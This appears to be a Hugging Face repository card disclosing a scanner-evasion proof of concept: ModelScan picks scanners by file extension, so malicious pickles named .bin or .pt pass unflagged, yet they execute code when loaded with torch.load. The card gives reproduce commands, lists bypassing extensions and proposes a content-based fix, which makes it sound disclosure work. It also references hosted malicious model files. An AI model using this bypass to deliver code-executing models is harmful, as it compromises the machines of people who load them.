YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

ModelScan Extension Mismatch Bypass PoC

Vulnerability

ModelScan routes scanners based on file extension. A malicious pickle payload saved with .bin or .pt extension completely bypasses detection because these extensions are not mapped to the pickle scanner.

Same pattern as CVE-2025-10155 (picklescan) but in ModelScan.

Files

  • malicious_model.bin - Malicious pickle disguised as PyTorch binary
  • malicious_model.pt - Malicious pickle disguised as PyTorch model
  • poc_full.py - Full PoC script

Reproduce

pip install modelscan torch

# Step 1: Scan โ€” ModelScan says SAFE
modelscan -p malicious_model.bin
# Result: No issues found

# Step 2: Load โ€” Code executes
python -c "import torch; torch.load('malicious_model.bin', weights_only=False)"
# Result: arbitrary code execution

# Compare with .pkl extension โ€” ModelScan DETECTS it
modelscan -p malicious_model.pkl
# Result: 1 issue found (unsafe operator)

Impact

10 extensions bypass ModelScan: .bin, .pt, .pth, .safetensors, .onnx, .keras, .h5, .npz, .model, .weights

Most critical: .bin and .pt because they are standard PyTorch formats commonly distributed on HuggingFace and loaded with torch.load().

Fix

ModelScan should detect pickle format by content inspection (magic bytes), not just file extension. Or add .pt/.pth/.bin to the pickle scanner mapping.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support